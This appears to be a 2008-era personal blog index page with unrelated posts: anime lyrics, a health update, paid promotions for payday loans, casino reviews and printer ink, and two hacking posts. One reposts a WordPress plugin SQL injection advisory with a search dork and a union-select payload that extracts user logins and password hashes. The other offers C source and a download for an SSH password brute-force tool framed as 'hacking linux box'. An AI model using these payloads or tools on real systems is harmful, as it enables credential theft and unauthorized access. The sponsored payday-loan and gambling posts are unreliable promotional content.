highly critical issue i found several day ago that wordpress 2.3.3 has vulnerability.and it has posted smackdown.blogsblogsblogs.com, shoemoney.com and even at the wordpress forum. i hope all fixed because wordpress has release the newest version.

but another vulnerability has found by BL4CK an author from milw0rm.com that another wordpress plugin vulnerable can be injected by SQLinjection like the papper BL4CK wrote below

# Wordpress Plugin Download file Remote SQL Injection Vulnerability

# Author: BL4CK

# Mail: bl4ck00@gmail.com

# Dork: inurl:”wp-download.php?dl_id=”

#Example:

http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]

#SQL:

null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*

wanna try this one?

(more…)

Last week was one of the most terrible week in my life. Everything went so bad. First my car broke down and cost me a bomb, then I had to work OT for 2 weeks continuously. Not enough? Anemia follow up hitting me. Which made me felt very, very terrible.

Just got back from clinic having my blood tested. The doctor told me that I was pretty fine (WTF?!? Was he kidding?? ), and the only problem is that I suffer slight hypotension (low-blood-pressure) and need more rest. That’s why I haven’t updated my blog since then.

But well, I hope that all the bad things and epidemic will go over very soon!!

No Post Relate to this

• December 31, 2007 — Blog Engine Upgraded (13)
• December 6, 2007 — Google? Google! (24)
• January 23, 2008 — BetterCaring : The Best Nursing Home (2)
• March 1, 2008 — Jokes From Register.net.id (8)
• July 17, 2007 — R.I.P. Sandriani (4)

(more…)

I’ve doing many things today, fixing bsuite bstat to work with wordpress 2.5, and do some research on AutoHack. Bstat is my only choice for grabbing the search term from search engine. I’ve usded Search term Tagging before. The result is good. But, I can’t use it for long term because it will register custom field in wordpress post-new page every new search arrive. It will increase the load time when creating new post.

Back to the topic. There are many online gaming website which need to be reviewed and tested before we start there. We need a reviewer to check whether the gambling service is legit or not. There are many reviewers, but this maybe helps us out to find the trustworthy online gaming service, find the strategy tips, and avoid scammers.

Online casino review is based on many factors. These are including whether the review based on personal experience or just promoting the affiliate link. Is he had enough experience to review the game? Is he/she capable to explain many odds jargon? The reviewer will give do and don’ts when applying, playing and withdraw.

Reviewer with personal experience will have power with the review. I think Casino Scrutiny does that. The content written there is based on personal experience. With 2 years playing online gambling, it will become strong review.

Instead of reading sales letter, we need a personal experience report.

PS: About my bstat progress, it’s done successfully. I will put this plugin to my other blog soon.

And here is the 4th ending song and also the last ending song of Hayate no Gotoku. Hmm, started from episode 35, I haven’t watched the rest because I’m becoming more and more busy with the schools, etc. Hhh, I really want to watch it again. Really, this anime is funny and can refresh me up from the stress I got on the day. Anyways, here is the lyric for this song, Ko no Me Kaze by IKU.

Ko no Me Kaze
by IKU
Hayate no Gotoku 4th Ending Song

Namae yonde boku ni todoku you ni
Hibiku koe wa kaze o okosu kara
Sono te nobashite tsunagou egao ni naru kara
Saa ikou bokura wa ima o mitsumete
Aruki hajimeru

Isogi ashi de tatta hitori
Sora no iro sae kidzukazu ni
Hitasura aruiteta

Aisaretai Fureraretetai
Motomeru bakari no kimochi wa hibi o kumoraseteta

Kimi ni deau sono hi made wa

Namae yonde sora ni hibiku you ni
Mayoi michi mo kitto futari nara
Arukidasu toki sekai ga mikata ni kawaru
Asa ga kuru bokura wa kaze o kanjite…

Kimi no tame ni kimi no tonari ni iru kara
Hana no kisetsu mo zutto
Sono saki mo zutto

Issho ni itai to negau n da

Namae yonde boku ni todoku you ni
Hibiku koe wa kaze o okosu kara daijoubu

Namae yonde sora ni hibiku you ni
Mayoi michi mo kitto futari nara
Arukidasu toki sekai ga mikata ni kawaru
Asa ga kuru bokura wa kaze o kanjite…

Tsunaida te to te hanasanai mamoritai n da
Saa ikou bokura wa ima o mitsumete
Aruki hajimeru

Kanji Version

名前呼んで 僕に届くように
響く声は 風を起こすから
その手伸ばして つなごう 笑顔になるから
さあ行こう 僕らは 現在を見つめて
歩き始める

急ぎ足で たったひとり
空の色さえ気づかずに
ひたすら歩いてた

愛されたい 触れられてたい
求めるばかりの気持ちは 日々を曇らせてた

君に出会うその日までは

名前呼んで 空に響くように
迷い道も きっとふたりなら
歩き出すとき 世界が味方に変わる
朝が来る 僕らは 風を感じて・

君のために 君のとなりに居るから
花の季節もずっと
その先もずっと

一緒に居たいと願うんだ

名前呼んで 僕に届くように
響く声は 風を起こすから　大丈夫

名前呼んで 空に響くように
迷い道も きっとふたりなら
歩き出すとき 世界が味方に変わる
朝が来る 僕らは 風を感じて・

つないだ手と手 離さない守りたいんだ
さあ行こう 僕らは　現在を見つめて
歩き始める

(more…)

I know, maybe there isn’t anime that have this song as the theme. But this song is in Hayate no Gotoku ED3 - Chasse Single. And because of that, I post about it here. I also put a player (as always) for you who want to hear this song. It’s a nice song just like the other one, Chasse by Utatsuki Kaori. Match perfectly with mood right now

Change of Heart
by Utatsuki Kaori
Hayate no Gotoku ED3 Single

Asa no hikari abita yokogao ni ima made to chigau atarashii yokan
Kitto nanika ugokidasou to shiteiru
Kinou made no kanashii hibi ni mo sayounara
Subete sutete hora mune atsuku
Afureru omoi o taisetsu ni daite

Bukiyou datte ii, sou, doomawari datte ii yo
Hito to kurabe naku te ii, sou, akiramenai kimochi ga areba
Tadoritsukeru kara

Change of heart, oozora ni kao o agete
Arukidasou hikari no sasu “shiawase no basho” e
Me no mae ni hirogaru atarashii sekai
Dokomademo tsudzuite yuku ookina yume o tsukami ni ikou

Change of heart and leave for dream
Believe yourself and leave your wish
Enlarge your wing and high up in the sky like a white bird

Yozora hikaru ikusen no hoshi ni negaigoto kirari shizuku no sain
Kitto nanika hajimarou to shiteru
Kinou made no taikutsuna hibi ni sayounara
Subete sutete hora mune atsuku
Wakitatsu yuuki o taisetsu ni daite

Machigae tatte ii, nee, kakkowaruku tatte ii yo
Tatoe waware tatte ii, sou, ganbaru sugata miteiru hito ga
Kanarazu iru kara…

Change of heart and leave for dream
Believe yourself and leave your wish
Enlarge your wing and high up in the sky like a white bird

Massuguna hitomi de jibun shinjite ippoippo susunde yukou…

Change of heart oozora ni tsubasa hiroge
Habatakou hikari no sasu “kagayaku mirai” e
Mabushii daremo mitakoto nai sekai
Hate shinaku tsudzuite yuku, ookina kibou kanae ni ikou.

Change of heart and leave for dream
Believe yourself and leave your wish
Enlarge your wing and high up in the sky like a white bird

Translation

The smile you give in the morning light gives me a different feeling to ever before
Something must have started.
Say farewell to the sad days of yesterday.
Throw everything aside and feel your heart warm up.
Embrace your overflowing feelings, and keep them close.

It doesn’t matter if you’re clumsy, yep, it doesn’t matter if you do things in a roundabout way.
It doesn’t matter if you don’t math up to others, yep, as long a you have feelings to never give in.
You’ll reach your destination.

Change of heart, lift your face to the clouds,
Towards the “Place of Happiness” that the light beckons.
The new world is folding out in front of your eyes,
It’ll continue forever, so go catch your greatest dream.

Change of heart and leave for dream
Believe yourself and leave your wish
Enlarge your wing and high up in the sky like a white bird

All the sparkling stars with my wishes on them in the night sky are a sign,
Something must have begun.
Say farewell to the boring days of yesterday.
Throw everything aide and feel your heart warm up.
Embrace your boiling courage, and keep it safe.

It doesn’t matter if you’re wrong, okay, it doesn’t matter if you’re not cool.
If you just smile, yep, there will definitely be people…
Who will see you trying your best….

Change of heart and leave for dream
Believe yourself and leave your wish
Enlarge your wing and high up in the sky like a white bird

Look straight ahead, believe in yourself, and march forward.

Change of heart, spread your wings in the blue sky.
Fly toward the “sparkling future” that the light beckons
A dazzling world noone has ever laid eyes upon,
Will unfold before you, go and make your hope into truth.

Change of heart and leave for dream
Believe yourself and leave your wish
Enlarge your wing and high up in the sky like a white bird.

(more…)

Hey a new month is coming and so is our paycheck for this month, pay your bills right away, and save some money if there are some left, don’t spend all of them and leaving your bank account dry or else you’ll have to take some payday loan to “survive” the rest of the month. If you are forced to get payday loans because of some emergency situation, unexpected spending, taking a vacation, or as ridiculous as unable to resist the temptation of shopping, you could do it online through Trust Source.

The site offers an easy payday loans portal with reviews of each payday loans website from the person that had already use the service of each site. That way you could judge which of the site is better and more suitable for you. Before applying to one of the site’s service, make sure that you are:

· Being employed for at least 3 consecutive months.

· Earning at least $1,000 per month in income.

· Having a valid checking account open for at least 3 months.

If you’re satisfied or unsatisfied about the site’s service why not take a time to write a review about it at Trust Source and give it a score between 1-5 stars, this way you could help other make sure they have the payday loans that they need.

Internet has become one of the strongest tools for marketing a product or service since the booming of the .com era, and it is still effective until now. There are a few methods in internet marketing; one of them is through an Email Marketing. Email Marketing is by mean sending emails with the purpose of enhancing the relationship of a merchant with its current or old customers and to encourage customer loyalty and repeat business, or gaining new customers as well. If compared to other media email marketing is less expensive, instant, and easy to track.

One of the Email Marketing providers on the web is Campaigner.com. Online marketing software is available for you to use at a start price of $25 per month with minimal customization and CampaignerPro that starts at $375 per month with the highest levels of personalization and integrated email marketing automation. You could also maximize those email marketing services with other programs like:

·         Email Campaign management

·         Email Template design

·         Product training

·         Integration services to synchronize with your CRM

·         List hygiene services (clean duplicates, invalid email addresses, etc.)

Checkout campaigner.com and get more detailed with the services as well as product tour, product demo, and testimonials of who had used the service.

if you have read my articles about hacking linux via telnet brute force using telnet_crack.pl there is one characteristic, it has to be brute force one. i think this all the basic of metasploit works. it brute force way. and since linux application not have so many vulnerable like windows base. ok, now i’ll post about hacking linux box using ssh brute force attack.and good news that i’ll share the ssh brute foce packages here. even it is a old stuff i think this technique will keep used. the one problem is the word list for password brute force has to be the good one.

–[1]– Requirement

• libssh-0.1.tgz
• gcc compiler
• unix box

–[2]– brute force concept

like i said before this is brute force attack type.so what the code will do is just password guessing from the password list you have. you can download password list from my telnet_crack.pl post. i take it from http://www2.packetstormsecurity.org/ or you can make by your self. i’ll give you the complete packages here. it ’s include the code , libssh-0.1.tgz , example for the password list. and the last is of course the readme.

–[3]– Code Preview

#include <libssh/libssh.h>
#include <libssh/sftp.h>
#define PORT 22

void checkauth(char *user, char *password, char *host)
{
SSH_SESSION *session;
SSH_OPTIONS *options;
int argc=1;
char *argv[]={”none”};

options=ssh_getopt(&argc,argv);
options_set_username(options,user);
options_set_host(options,host);
options_set_port(options,PORT);
session=ssh_connect(options);
if(!session) return ;

if(ssh_userauth_password(session,NULL,password) != AUTH_SUCCESS)
{
printf(”%s:%s:%s -> BaD Password\n”,user,password,host);
ssh_disconnect(session);
return;
}else{
printf(”%sOk.TRY This : %s:%s:%s\n”,warn,user,password,host);
}
}

i hope just by read this code you can undestand how this code works. i think this enough. you can download the ssh brute force package below

sshbrute-backtrackboxcomtar.gz

it taken from www.kecoak-elektronik.net

(more…)

Printing is an activity that has been related to computer since the Intel’s Pentium desktop era. At the time printers were starting to use the inkjet technology which sprays paint to the paper, it was cheaper and better in printing quality outstand the dot-matrix printer which was
not very friendly to be placed at home. Today, the printing technology has brought us professional printing machine capable of good image printing available for desktops and a wide selection from manufacturers like HP, Canon, etc. These printers divide each major printing color CMYK into individual tanks, so you may replace the tanks selectively without changing the whole color set.

HP with its Photosmart series is one of the best photo printers out there in the market, and printing photos are ink-thirst process so running out of ink tanks could be disastrous especially when printing so many photos at one time. If you hadn’t the time to go out at your local printer
accessories store you should go to Voltexx.com, an online printer accessories store. Voltexx.com sells many types of inkjet cartridges and toner cartridges from major printer vendors like HP and Canon. It supplies printing accessories needs for both personal and office while having great discounts over the products as well. So, if you are in need of printing supplies, Voltexx.com is your best option.

Just got a new info about this tool . If you’re into Web Application penetration testing , and curious about Sql injection stuffs , you should try Pangolin , it’s known as the best sql injection tool.
Pangolin runs on Windows , and performs as more as possible pen-testing through Sql injection. The supported operations [...]

(more…)